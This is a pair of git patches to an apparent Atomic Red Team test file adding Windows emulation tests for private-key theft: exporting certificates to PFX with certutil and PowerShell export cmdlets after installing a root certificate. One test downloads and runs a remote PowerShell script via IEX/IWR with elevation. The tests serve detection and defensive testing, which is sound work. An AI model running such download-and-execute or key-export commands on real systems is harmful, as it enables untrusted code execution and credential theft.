From 599e147cfd88c38d9cc1358048d530cb9547c552 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Sat, 4 Feb 2023 05:55:40 -0700
Subject: [PATCH 1/2] ExportPFX

---
 atomics/T1552.004/T1552.004.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)

diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index 9fe68db7..a258c346 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -197,3 +197,18 @@ atomic_tests:
       Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
       Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
     name: powershell
+- name: CertUtil ExportPFX
+  description: |
+    The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+    Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
+    Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+       IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) 
+       certutil -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\temp\atomic.pfx 
+    cleanup_command: |
+       Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item 
+    name: powershell
+    elevation_required: true
\ No newline at end of file

From c0bba5e5ec711177d2fff2ade81535bf33014c3a Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Sat, 4 Feb 2023 06:36:46 -0700
Subject: [PATCH 2/2] Update T1552.004.yaml

---
 atomics/T1552.004/T1552.004.yaml | 66 ++++++++++++++++++++++++++++++--
 1 file changed, 63 insertions(+), 3 deletions(-)

diff --git a/atomics/T1552.004/T1552.004.yaml b/atomics/T1552.004/T1552.004.yaml
index a258c346..83b06ab3 100644
--- a/atomics/T1552.004/T1552.004.yaml
+++ b/atomics/T1552.004/T1552.004.yaml
@@ -199,16 +199,76 @@ atomic_tests:
     name: powershell
 - name: CertUtil ExportPFX
   description: |
-    The following Atomic test simulates adding a generic non-malicious certificate to the CurrentUser certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog.
+    The following Atomic test simulates adding a generic non-malicious certificate to the Root certificate store. This behavior generates a registry modification that adds the cloned root CA certificate in the keys outlined in the blog. In addition, this Atomic utilizes CertUtil to export the PFX (ExportPFX), similar to what was seen in the Golden SAML attack.
     Keys will look like - \SystemCertificates\CA\Certificates or \SystemCertificates\Root\Certificates
     Reference: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
+    Reference: https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html
   supported_platforms:
   - windows
+  input_arguments:
+    output:
+      description: file path to export to
+      type: Path
+      default: c:\temp\atomic.pfx
+    password:
+      description: password for cert
+      type: String
+      default: password
   executor:
     command: |
        IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1553.004/src/RemoteCertTrust.ps1' -UseBasicParsing) 
-       certutil -p password -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 c:\temp\atomic.pfx 
+       certutil.exe -p #{password} -exportPFX Root 1F3D38F280635F275BE92B87CF83E40E40458400 #{output}
     cleanup_command: |
        Get-ChildItem -Path Cert:\ -Recurse | Where-Object { $_.Thumbprint -eq '1F3D38F280635F275BE92B87CF83E40E40458400' } | remove-item 
     name: powershell
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+- name: Export Root Certificate with Export-PFXCertificate
+  description: |
+    Creates a Root certificate and exports it with Export-PFXCertificate PowerShell Cmdlet.
+    Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-PFXCertificate.
+  supported_platforms:
+  - windows
+  input_arguments:
+    pfx_path:
+      description: output path of the certificate
+      type: String
+      default: $env:Temp\atomicredteam.pfx
+  executor:
+    command: |
+      $mypwd = ConvertTo-SecureString -String "AtomicRedTeam" -Force -AsPlainText
+      $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+      Set-Location Cert:\LocalMachine\My
+      Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath #{pfx_path} -Password $mypwd
+    cleanup_command: |
+      try {
+      $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
+      Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      } catch { }
+    name: powershell
+    elevation_required: true
+- name: Export Root Certificate with Export-Certificate
+  description: |
+    Creates a Root certificate and exports it with Export-Certificate PowerShell Cmdlet.
+    Upon a successful attempt, this will write a pfx to disk and utilize the Cmdlet Export-Certificate.
+  supported_platforms:
+  - windows
+  input_arguments:
+    pfx_path:
+      description: Path of the certificate
+      type: Path
+      default: $env:Temp\AtomicRedTeam.cer
+  executor:
+    command: |
+      $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My
+      Set-Location Cert:\LocalMachine\My
+      Export-Certificate -Type CERT -Cert  Cert:\LocalMachine\My\$($cert.Thumbprint) -FilePath #{pfx_path}
+    cleanup_command: |
+      try {
+         $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My -ErrorAction Ignore
+         Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+         Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
+      }
+      catch { }
+    name: powershell
+    elevation_required: true 
\ No newline at end of file